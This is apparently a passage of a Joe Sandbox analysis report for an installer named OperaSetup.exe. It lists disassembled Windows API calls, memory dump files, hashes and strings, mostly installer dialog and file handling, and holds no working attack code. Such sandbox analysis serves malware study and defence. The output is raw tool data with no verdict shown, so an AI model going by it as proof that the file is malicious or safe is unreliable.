• SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
• ShowWindow.USER32(?,00000000), ref: 00405672
• GetDlgItem.USER32(?,000003FE), ref: 0040567D
• ShowWindow.USER32(00000000), ref: 00405684
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
• ShowWindow.USER32(?), ref: 0040417E
• GetWindowLongW.USER32(?,000000F0), ref: 00404190
• ShowWindow.USER32(?,00000004), ref: 004041A9
• DestroyWindow.USER32 ref: 004041BD
• SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
• GetDlgItem.USER32(?,?), ref: 004041F5
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
• IsWindowEnabled.USER32(00000000), ref: 00404210
• GetDlgItem.USER32(?,00000001), ref: 004042BB
• GetDlgItem.USER32(?,00000002), ref: 004042C5
• SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
• GetDlgItem.USER32(?,00000003), ref: 004043D6
• ShowWindow.USER32(00000000,?), ref: 004043F7
• EnableWindow.USER32(?,?), ref: 00404409
• EnableWindow.USER32(?,?), ref: 00404424
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
• EnableMenuItem.USER32(00000000), ref: 00404441
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
• lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
• SetWindowTextW.USER32(?,00442748), ref: 004044AA
• ShowWindow.USER32(?,0000000A), ref: 004045DE
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
• String ID: H'D
• API String ID: 1860320154-716976774
• Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
• Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
• GetDlgItem.USER32(?,000003E8), ref: 00404892
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
• GetSysColor.USER32(?), ref: 004048C0
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
• lstrlenW.KERNEL32(?), ref: 004048E1
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
• GetDlgItem.USER32(?,0000040A), ref: 0040495C
• SendMessageW.USER32(00000000), ref: 00404963
• GetDlgItem.USER32(?,000003E8), ref: 0040498E
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
• LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
• SetCursor.USER32(00000000), ref: 004049E2
• LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
• SetCursor.USER32(00000000), ref: 004049FE
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$N$WG@
• API String ID: 3103080414-88766510
• Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
• Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404B61
• SetWindowTextW.USER32(00000000,?), ref: 00404B8B
• SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
• CoTaskMemFree.OLE32(00000000), ref: 00404C47
• lstrcmpiW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00442748,00000000,?,?), ref: 00404C79
• lstrcatW.KERNEL32(?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00404C85
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
  • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
  • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
  • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
  • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
  • Part of subcall function 00406950: CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
• GetDiskFreeSpaceW.KERNEL32(00432718,?,?,0000040F,?,00432718,00432718,?,00000001,00432718,?,?,000003FB,?), ref: 00404D5A
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
  • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
  • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
  • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$A$H'D
• API String ID: 2624150263-4075856908
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
• GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
• GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
• wsprintfA.USER32 ref: 00406367
• GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
• SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
• GlobalFree.KERNEL32(00000000), ref: 00406450
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
APIs
• GetSystemDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000), ref: 00406801
• GetWindowsDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406817
• SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00406875
• CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
• lstrcatW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,\Microsoft\Internet Explorer\Quick Launch,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
• lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406903
Similarity
• API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 4024019347-1466120327
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004046A5
• GetSysColor.USER32(00000000), ref: 004046E3
• SetTextColor.GDI32(?,00000000), ref: 004046EF
• SetBkMode.GDI32(?,?), ref: 004046FB
• GetSysColor.USER32(?), ref: 0040470E
• SetBkColor.GDI32(?,?), ref: 0040471E
• DeleteObject.GDI32(?), ref: 00404738
• CreateBrushIndirect.GDI32(?), ref: 00404742
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                                              • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                            • String ID: 9
                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                            • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
                                                                                                                                                                            • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                            • lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                            • lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                            • SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2531174081-0
                                                                                                                                                                            • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                                                            • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                                              • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,000377E3), ref: 0040304C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                            • Opcode ID: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                                                            • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                                                            • Opcode Fuzzy Hash: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                                                            • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                                                            • wsprintfW.USER32 ref: 0040300A
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                            • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                                                            • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
• GlobalFree.KERNEL32(?), ref: 00402A2B
• GlobalFree.KERNEL32(00000000), ref: 00402A3E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
• Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
• Opcode Fuzzy Hash: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
• Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68
APIs
• lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
• wsprintfW.USER32 ref: 00404F78
• SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
